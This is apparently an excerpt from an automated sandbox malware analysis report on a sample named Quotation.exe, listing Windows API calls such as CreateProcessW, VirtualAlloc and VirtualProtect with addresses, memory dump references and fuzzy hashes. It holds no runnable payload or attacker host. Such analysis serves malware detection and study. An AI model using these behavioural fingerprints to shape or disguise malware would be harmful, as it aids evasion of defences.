                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 3850602802-0
                                                                                              • Opcode ID: 21554dfdf2296733f6a7aae3810b83fc303a9337ac7eb4ef6af54ee552a22d80
                                                                                              • Instruction ID: 15b31486c92c371a01b824ec8c308dd00c5fb3f6de234e3455dc008c55755f60
                                                                                              • Opcode Fuzzy Hash: 21554dfdf2296733f6a7aae3810b83fc303a9337ac7eb4ef6af54ee552a22d80
                                                                                              • Instruction Fuzzy Hash: 2A01D472E542309BD7196F28AC09B2A2699A7C1711F15893EF901F72F1E6B89D01879C
                                                                                              APIs
                                                                                                • Part of subcall function 00406AF8: lstrcpynW.KERNEL32(?,?,00000400,0040384F,007A7540,NSIS Error), ref: 00406B05
                                                                                                • Part of subcall function 00406BA3: CharNextW.USER32(?,?,?,00000000,007A4288,0040662D,007A4288,007A4288,?,?,?,00406719,?,00000000,771B3420,?), ref: 00406BB2
                                                                                                • Part of subcall function 00406BA3: CharNextW.USER32(00000000), ref: 00406BB7
                                                                                                • Part of subcall function 00406BA3: CharNextW.USER32(00000000), ref: 00406BD1
                                                                                                • Part of subcall function 00406D1B: CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user~1\AppData\Local\Temp\,00000000,C:\Users\user~1\AppData\Local\Temp\,00403C8F,C:\Users\user~1\AppData\Local\Temp\,771B3420,004039A0), ref: 00406D90
                                                                                                • Part of subcall function 00406D1B: CharNextW.USER32(?,?,?,00000000), ref: 00406D9F
                                                                                                • Part of subcall function 00406D1B: CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user~1\AppData\Local\Temp\,00000000,C:\Users\user~1\AppData\Local\Temp\,00403C8F,C:\Users\user~1\AppData\Local\Temp\,771B3420,004039A0), ref: 00406DA4
                                                                                                • Part of subcall function 00406D1B: CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user~1\AppData\Local\Temp\,00000000,C:\Users\user~1\AppData\Local\Temp\,00403C8F,C:\Users\user~1\AppData\Local\Temp\,771B3420,004039A0), ref: 00406DBC
                                                                                              • lstrlenW.KERNEL32(007A4288,00000000,007A4288,007A4288,?,?,?,00406719,?,00000000,771B3420,?), ref: 0040666A
                                                                                              • GetFileAttributesW.KERNELBASE(007A4288,007A4288), ref: 0040667B
                                                                                                • Part of subcall function 004065AD: FindFirstFileW.KERNELBASE(?,007A5E88,00000000,0040665A,007A4288), ref: 004065B8
                                                                                                • Part of subcall function 004065AD: FindClose.KERNEL32(00000000), ref: 004065C4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID: Char$Next$FileFind$AttributesCloseFirstPrevlstrcpynlstrlen
                                                                                              • String ID:
                                                                                              • API String ID: 1879705256-0
                                                                                              • Opcode ID: 3b9d5aeb4753024ac2323fedf4887ec0200a7770af3d0f5eda4629e85134c37a
                                                                                              • Instruction ID: a0caebe489df7e9b8c47fc78556c087e467958ed1b806a88a2837ae242d5d264
                                                                                              • Opcode Fuzzy Hash: 3b9d5aeb4753024ac2323fedf4887ec0200a7770af3d0f5eda4629e85134c37a
                                                                                              • Instruction Fuzzy Hash: FAF0C2614042212AC72037751E88A2B255C8E4635971B4F3FFCA7F12D2CA7ECC31957D
                                                                                              APIs
                                                                                              • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A3A40,?), ref: 004066DD
                                                                                              • CloseHandle.KERNEL32(?), ref: 004066EA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseCreateHandleProcess
                                                                                              • String ID:
                                                                                              • API String ID: 3712363035-0
                                                                                              • Opcode ID: 36c5eb473c901fdc976d11b5d23e54a470827d4f9f65b3378b18ae8ddc32ee08
                                                                                              • Instruction ID: 38b84478e037bba77e5bda8d52abba300c1c8c141792dec0b9fd1b8b871a7deb
                                                                                              • Opcode Fuzzy Hash: 36c5eb473c901fdc976d11b5d23e54a470827d4f9f65b3378b18ae8ddc32ee08
                                                                                              • Instruction Fuzzy Hash: 45E0BFF0600219BFFB009F64ED05E7BB66CFB44604F008529BD51E6150D77499149A79
                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNELBASE(?,0040340D,C:\Users\user\Desktop\Quotation.exe,80000000,00000003), ref: 004068FD
                                                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000000,00000000), ref: 0040691D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$AttributesCreate
                                                                                              • String ID:
                                                                                              • API String ID: 415043291-0
                                                                                              • Opcode ID: 0b70b3aee83a9b3875abd98ff145d1d59e445032f30ecb3830cc7005a44e8a60
                                                                                              • Instruction ID: 2b20bdeb62c6161fa823f395ef17c7eb789f23499ed64d7ea8bf83f44df62fc9
                                                                                              • Opcode Fuzzy Hash: 0b70b3aee83a9b3875abd98ff145d1d59e445032f30ecb3830cc7005a44e8a60
                                                                                              • Instruction Fuzzy Hash: 3ED09E71118201AEDF054F20DE4AF1EBA65EF84710F114A2CF6A6D40F0DA718865AA15
                                                                                              APIs
                                                                                              • WriteFile.KERNELBASE(?,?,?,?,00000000,?,00000000,?,00793200,00403326,?,00793200,?,00793200,?,?), ref: 00406A00
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3934441357-0
                                                                                              • Opcode ID: fcbaaa44ab5e5c94c5d9c511509a2faa156d79933b004821766515c4fe93841a
                                                                                              • Instruction ID: af586fd2f7f6880044e5fe5766d6096d47c0719768b2310f5fb2dcc6f4abfd7b
                                                                                              • Opcode Fuzzy Hash: fcbaaa44ab5e5c94c5d9c511509a2faa156d79933b004821766515c4fe93841a
                                                                                              • Instruction Fuzzy Hash: 68E0BF32600119BB8F205B56DD04D9FBF6DEE927A07124026F906B6150D670EA51DAE4
                                                                                              APIs
                                                                                              • ReadFile.KERNELBASE(?,?,?,?,00000000,?,00000000,?,00000000,004031A2,?,?,00000000,00000000,00000000,00000000), ref: 0040693D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileRead
                                                                                              • String ID:
                                                                                              • API String ID: 2738559852-0
                                                                                              • Opcode ID: f8dde0e6d0967dcd1486054d06716264d6198d5106f5dd6c4da627d3f0af441a
                                                                                              • Instruction ID: de6cc0abbc936f950c0aa48064430f9d9b1dfb465831d1c2e6fd43c94deb3c7e
                                                                                              • Opcode Fuzzy Hash: f8dde0e6d0967dcd1486054d06716264d6198d5106f5dd6c4da627d3f0af441a
                                                                                              • Instruction Fuzzy Hash: B7E0BF72200119BB8F215F46DD04D9FBF6DEE956A07114026B905A6150D670EA11D6E4
                                                                                              APIs
                                                                                              • VirtualProtect.KERNELBASE(73C6501C,?,?,73C65034), ref: 73C61A68
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1700170196.0000000073C61000.00000020.00000001.01000000.00000006.sdmp, Offset: 73C60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1700136745.0000000073C60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1700188621.0000000073C64000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1700247569.0000000073C66000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_73c60000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID: ProtectVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 544645111-0
                                                                                              • Opcode ID: 079effaf9699c261382ffc22a019861d4cad119b71d3585fc313606484383f9f
                                                                                              • Instruction ID: fa92a48ef7b0a550fe139c005557f6b65d6654218464db3be658fc7ed3c27cc6
                                                                                              • Opcode Fuzzy Hash: 079effaf9699c261382ffc22a019861d4cad119b71d3585fc313606484383f9f
                                                                                              • Instruction Fuzzy Hash: C9F098F291DB81EAC328EF5B94847053AE0A718345F30452EF79EDE341C330C9009B9A
                                                                                              APIs
                                                                                              • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,?,?,?,?,?,00406983,?,?,?,?,Call,00000000,00000000), ref: 004062DA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID: Open
                                                                                              • String ID:
                                                                                              • API String ID: 71445658-0
                                                                                              • Opcode ID: 5d90062fdd1cff32f27602045ec2692a1b627fa5483aed50fd6290a01ccc32d2
                                                                                              • Instruction ID: 8275c49ac47c74d38988e0f8258bf7c149b7cc7998a497f72a9ef83b4f38b8ad
                                                                                              • Opcode Fuzzy Hash: 5d90062fdd1cff32f27602045ec2692a1b627fa5483aed50fd6290a01ccc32d2
                                                                                              • Instruction Fuzzy Hash: 51D0123204020DBBDF11AF90DD01FAB372DAB08750F01443AFE16A40A0D775D531A718
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004054D8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 3850602802-0
                                                                                              • Opcode ID: b2e0c2379e296d93849bb49f42c53d0230087db54a3c83b1da74e836768489aa
                                                                                              • Instruction ID: ded955796c7b3a29419b03b8f07dbed72bf973f4b2991851ad7e5473cbc7331c
                                                                                              • Opcode Fuzzy Hash: b2e0c2379e296d93849bb49f42c53d0230087db54a3c83b1da74e836768489aa
                                                                                              • Instruction Fuzzy Hash: C3C04C716446007ADA109B619E05F077759A791701F10C8297240E55E0C675E460CA2C
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,?,00000001,00405316), ref: 004054EF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 3850602802-0
                                                                                              • Opcode ID: 1714e4f5a6add7520e2ba1d59cc8065429a1d3178019bc2ad80d0ec1eb9059a5
                                                                                              • Instruction ID: 87925707e6409367d6b01bd6df3e013852da7cf14c64ffa79ed0cacb9bd9d926
                                                                                              • Opcode Fuzzy Hash: 1714e4f5a6add7520e2ba1d59cc8065429a1d3178019bc2ad80d0ec1eb9059a5
                                                                                              • Instruction Fuzzy Hash: 28B09239684600AADA195B00EE09F467B62ABA4701F008428B240640B0CAB210A0DB18
                                                                                              APIs
                                                                                              • SetFilePointer.KERNELBASE(?,00000000,00000000,004035B5,?), ref: 0040313F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID: FilePointer
                                                                                              • String ID:
                                                                                              • API String ID: 973152223-0
                                                                                              • Opcode ID: eeb6e3b4f510f7bce7f4acd2004317b94e1f980229c798523801c224a6f07df3
                                                                                              • Instruction ID: 249934cc5d2069a5a678a88893d20fb7c04287045258dfdbdab4020963f10c22
                                                                                              • Opcode Fuzzy Hash: eeb6e3b4f510f7bce7f4acd2004317b94e1f980229c798523801c224a6f07df3
                                                                                              • Instruction Fuzzy Hash: 94B09231140200AADA214F009E0AF057B21AB90700F108434B290680F086711060EA0D
                                                                                              APIs
                                                                                              • VirtualAlloc.KERNELBASE(?), ref: 73C62DD3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1700170196.0000000073C61000.00000020.00000001.01000000.00000006.sdmp, Offset: 73C60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1700136745.0000000073C60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1700188621.0000000073C64000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1700247569.0000000073C66000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_73c60000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 4275171209-0
                                                                                              • Opcode ID: 3720e32918e9b023efc9418a84ca8729d024a8a4d056bb2e9ad530249a36010e
                                                                                              • Instruction ID: e8b273024344ea3966bc1ba74dae2fffe87f110f9140ad032b6dc8911bb7b75b
                                                                                              • Opcode Fuzzy Hash: 3720e32918e9b023efc9418a84ca8729d024a8a4d056bb2e9ad530249a36010e
                                                                                              • Instruction Fuzzy Hash: 3741A0B6904709EFEB00EF66DAC1B4D37B9EB48356F354029E608DE250DA35D840CBC2
                                                                                              APIs
                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,?,00000000,?,0040623C,?,?), ref: 0040631F
                                                                                              • GetShortPathNameW.KERNEL32(?,007A5688,00000400), ref: 00406328
                                                                                              • GetShortPathNameW.KERNEL32(?,007A4E88,00000400), ref: 00406345
                                                                                              • wsprintfA.USER32 ref: 00406363
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,007A4E88,C0000000,?,007A4E88,?), ref: 0040639B
                                                                                              • GlobalAlloc.KERNEL32(?,0000000A), ref: 004063AB
                                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 004063DB
                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,007A4A88,00000000,-0000000A,00408984,00000000,[Rename],00000000,00000000,00000000), ref: 004063FB
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 0040640D
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00406414
                                                                                                • Part of subcall function 004068F9: GetFileAttributesW.KERNELBASE(?,0040340D,C:\Users\user\Desktop\Quotation.exe,80000000,00000003), ref: 004068FD
